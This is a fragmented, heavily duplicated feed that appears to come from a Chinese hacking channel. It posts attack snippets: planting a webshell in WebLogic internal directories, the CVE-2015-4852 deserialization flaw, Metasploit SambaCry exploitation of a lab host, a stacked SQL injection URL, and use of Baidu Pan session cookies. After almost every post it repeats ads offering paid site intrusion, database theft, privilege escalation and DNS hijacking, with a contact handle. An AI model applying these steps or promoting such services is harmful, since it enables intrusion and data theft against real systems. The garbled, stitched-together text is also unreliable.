发现没有_WL_user目录,所以把shell上传到自带的项目中。
通过执行命令ls /root/Oracle/Middleware/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/
发现有三个目录,分别为bea_wls9_async_response、bea_wls_internal和uddiexplorer。
将shell文件上传到任意一个目录下的war文件即可。
上传路径/root/Oracle/Middleware/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/1.txt
六合·色站·彩票·博彩·金融
接渗透拿站,各大网站数据-拖库-提权联系
域名劫持 DNS 入侵网站 联系:@hacker_HouZiM
通过执行命令ls /root/Oracle/Middleware/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/
发现有三个目录,分别为bea_wls9_async_response、bea_wls_internal和uddiexplorer。
将shell文件上传到任意一个目录下的war文件即可。
上传路径/root/Oracle/Middleware/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/1.txt
六合·色站·彩票·博彩·金融
接渗透拿站,各大网站数据-拖库-提权联系
域名劫持 DNS 入侵网站 联系:@hacker_HouZiM
❤1
漏洞编号:CVE-2015-4852
漏洞影响:
Oracle WebLogic Server 12.2.1.0
Oracle WebLogic Server 12.1.3.0
Oracle WebLogic Server 12.1.2.0
Oracle WebLogic Server 10.3.6.0
Oracle WebLogic Server 10.3.6.0, 12.1.2.0, 12.1.3.0, 12.2.1.0版本中,WLS Security组件允许远程攻击者执行任意命令。攻击者通过向TCP端口7001发送T3协议流量,其中包含精心构造的序列化Java对象利用此漏洞。此漏洞影响到WLS Security Handler的文件oracle_common/modules/com.bea.core.apache.commons.collections.jar内一个未知的函数。
这里还以SSRF的环境为例。
使用WebLogic反序列化工具进行验证(作者:rebeyond)。
漏洞影响:
Oracle WebLogic Server 12.2.1.0
Oracle WebLogic Server 12.1.3.0
Oracle WebLogic Server 12.1.2.0
Oracle WebLogic Server 10.3.6.0
Oracle WebLogic Server 10.3.6.0, 12.1.2.0, 12.1.3.0, 12.2.1.0版本中,WLS Security组件允许远程攻击者执行任意命令。攻击者通过向TCP端口7001发送T3协议流量,其中包含精心构造的序列化Java对象利用此漏洞。此漏洞影响到WLS Security Handler的文件oracle_common/modules/com.bea.core.apache.commons.collections.jar内一个未知的函数。
这里还以SSRF的环境为例。
使用WebLogic反序列化工具进行验证(作者:rebeyond)。
❤1👍1
找WEB绝对路径的另一种方式,Linux下使用命令find -name *.jsp来查找,例如已知hello项目里面有个file.jsp,则查找的命令为find -name file.jsp。对于Windows下,使用for /r c:\ %i in (file*.jsp) do @echo %i,也可以通过查看config/config.xml文件内容来确定web项目的绝对路径。
六合·色站·彩票·博彩·金融
接渗透拿站,各大网站数据-拖库-提权联系
域名劫持 DNS 入侵网站 联系:@hacker_HouZiM
六合·色站·彩票·博彩·金融
接渗透拿站,各大网站数据-拖库-提权联系
域名劫持 DNS 入侵网站 联系:@hacker_HouZiM
❤2👍1
在最底部添加如下内容
[fuping] #显示的共享文件夹名字
path = /tmp
public = yes
writeable = yes
六合·色站·彩票·博彩·金融
接渗透拿站,各大网站数据-拖库-提权联系
域名劫持 DNS 入侵网站 联系:@hacker_HouZiM
[fuping] #显示的共享文件夹名字
path = /tmp
public = yes
writeable = yes
六合·色站·彩票·博彩·金融
接渗透拿站,各大网站数据-拖库-提权联系
域名劫持 DNS 入侵网站 联系:@hacker_HouZiM
❤1👍1
首先去下载利用的脚本。
root@kali:~# cd /usr/share/metasploit-framework/modules/exploits/linux/samba
root@kali:/usr/share/metasploit-framework/modules/exploits/linux/samba# wget https://raw.githubusercontent.
root@kali:~# cd /usr/share/metasploit-framework/modules/exploits/linux/samba
root@kali:/usr/share/metasploit-framework/modules/exploits/linux/samba# wget https://raw.githubusercontent.
❤1👍1
然后就是在Metasploit中加载并使用脚本,攻击过程如下
msf > use exploit/linux/samba/is_known_pipename
msf exploit(is_known_pipename) > show options
Module options (exploit/linux/samba/is_known_pipename):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 445 yes The SMB service port (TCP)
SMB_FOLDER no The directory to use within the writeable SMB share
SMB_SHARE_BASE no The remote filesystem path correlating with the SMB share name
SMB_SHARE_NAME no The name of the SMB share containing a writeable directory
需要填写目标地址和选择Target,我的是x64位系统,所以设置了target为3。
六合·色站·彩票·博彩·金融
接渗透拿站,各大网站数据-拖库-提权联系
域名劫持 DNS 入侵网站 联系:@hacker_HouZiM
msf > use exploit/linux/samba/is_known_pipename
msf exploit(is_known_pipename) > show options
Module options (exploit/linux/samba/is_known_pipename):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 445 yes The SMB service port (TCP)
SMB_FOLDER no The directory to use within the writeable SMB share
SMB_SHARE_BASE no The remote filesystem path correlating with the SMB share name
SMB_SHARE_NAME no The name of the SMB share containing a writeable directory
需要填写目标地址和选择Target,我的是x64位系统,所以设置了target为3。
六合·色站·彩票·博彩·金融
接渗透拿站,各大网站数据-拖库-提权联系
域名劫持 DNS 入侵网站 联系:@hacker_HouZiM
❤2👍1
修改Ubuntu中的Samba配置文件。
sudo gedit /etc/samba/smb.conf
在[global]中添加:security = user
修改底部的[fuping]
[fuping] #显示的共享文件夹名字
path = /tmp
writeable = yes
六合·色站·彩票·博彩·金融
接渗透拿站,各大网站数据-拖库-提权联系
域名劫持 DNS 入侵网站 联系:@hacker_HouZiM
sudo gedit /etc/samba/smb.conf
在[global]中添加:security = user
修改底部的[fuping]
[fuping] #显示的共享文件夹名字
path = /tmp
writeable = yes
六合·色站·彩票·博彩·金融
接渗透拿站,各大网站数据-拖库-提权联系
域名劫持 DNS 入侵网站 联系:@hacker_HouZiM
❤1👍1
.开始攻击
msf > use exploit/linux/samba/is_known_pipename
msf exploit(is_known_pipename) > set SMBUSER smbuser
SMBUSER => smbuser
msf exploit(is_known_pipename) > set SMBPASS smbuser
SMBPASS => smbuser
msf exploit(is_known_pipename) > set RHOST 192.168.232.137
RHOST => 192.168.232.137
msf exploit(is_known_pipename) > exploit
六合·色站·彩票·博彩·金融
接渗透拿站,各大网站数据-拖库-提权联系
域名劫持 DNS 入侵网站 联系:@hacker_HouZiM
msf > use exploit/linux/samba/is_known_pipename
msf exploit(is_known_pipename) > set SMBUSER smbuser
SMBUSER => smbuser
msf exploit(is_known_pipename) > set SMBPASS smbuser
SMBPASS => smbuser
msf exploit(is_known_pipename) > set RHOST 192.168.232.137
RHOST => 192.168.232.137
msf exploit(is_known_pipename) > exploit
六合·色站·彩票·博彩·金融
接渗透拿站,各大网站数据-拖库-提权联系
域名劫持 DNS 入侵网站 联系:@hacker_HouZiM
❤2👍1
x01 如何获取重复的文件
这里以wap版为例。
打开https://pan.baidu.com/wap/home 并抓包。
可以看到一个Get请求
六合·色站·彩票·博彩·金融
接渗透拿站,各大网站数据-拖库-提权联系
域名劫持 DNS 入侵网站 联系:@hacker_HouZiM
这里以wap版为例。
打开https://pan.baidu.com/wap/home 并抓包。
可以看到一个Get请求
六合·色站·彩票·博彩·金融
接渗透拿站,各大网站数据-拖库-提权联系
域名劫持 DNS 入侵网站 联系:@hacker_HouZiM
❤2👍1
访问https://pan.baidu.com/wap/home ,查看源代码搜索bdstoken即可看到。
代码的实现如下:
Cookie只需要两个内容,一个是BDUSS,另一个是STOKEN。
六合·色站·彩票·博彩·金融
接渗透拿站,各大网站数据-拖库-提权联系
域名劫持 DNS 入侵网站 联系:@hacker_HouZiM
代码的实现如下:
Cookie只需要两个内容,一个是BDUSS,另一个是STOKEN。
六合·色站·彩票·博彩·金融
接渗透拿站,各大网站数据-拖库-提权联系
域名劫持 DNS 入侵网站 联系:@hacker_HouZiM
❤2👍1
查看数据库中的文件信息
由于有些目录下面是代码,而且文件多有小,所以就不针对这些文件目录下的文件进行遍历。就采用了白名单的方式,对白名单中内容不遍历。
由于某些路径中含有其他字符,导致找不到路径,使用采用了URL编码。
为了方便,直接将page设置为1,num值换为2000(可以根据自己的文件多少来调节,最好大一些),一页就将所有的数据显示出来。
插入数据库方法的代码比较简单,这里就省略了。
六合·色站·彩票·博彩·金融
接渗透拿站,各大网站数据-拖库-提权联系
域名劫持 DNS 入侵网站 联系:@hacker_HouZiM
由于有些目录下面是代码,而且文件多有小,所以就不针对这些文件目录下的文件进行遍历。就采用了白名单的方式,对白名单中内容不遍历。
由于某些路径中含有其他字符,导致找不到路径,使用采用了URL编码。
为了方便,直接将page设置为1,num值换为2000(可以根据自己的文件多少来调节,最好大一些),一页就将所有的数据显示出来。
插入数据库方法的代码比较简单,这里就省略了。
六合·色站·彩票·博彩·金融
接渗透拿站,各大网站数据-拖库-提权联系
域名劫持 DNS 入侵网站 联系:@hacker_HouZiM
❤2👍1
通过SQLMAP可以查看到是DBA权限
http://192.168.232.138:81/manage/news/Newslist.aspx?ClassID=1';CREATE TABLE tt_tmp (tmp1 varchar(8000));--
六合·色站·彩票·博彩·金融
接渗透拿站,各大网站数据-拖库-提权联系
域名劫持 DNS 入侵网站 联系:@hacker_HouZiM
http://192.168.232.138:81/manage/news/Newslist.aspx?ClassID=1';CREATE TABLE tt_tmp (tmp1 varchar(8000));--
六合·色站·彩票·博彩·金融
接渗透拿站,各大网站数据-拖库-提权联系
域名劫持 DNS 入侵网站 联系:@hacker_HouZiM
❤1👍1🔥1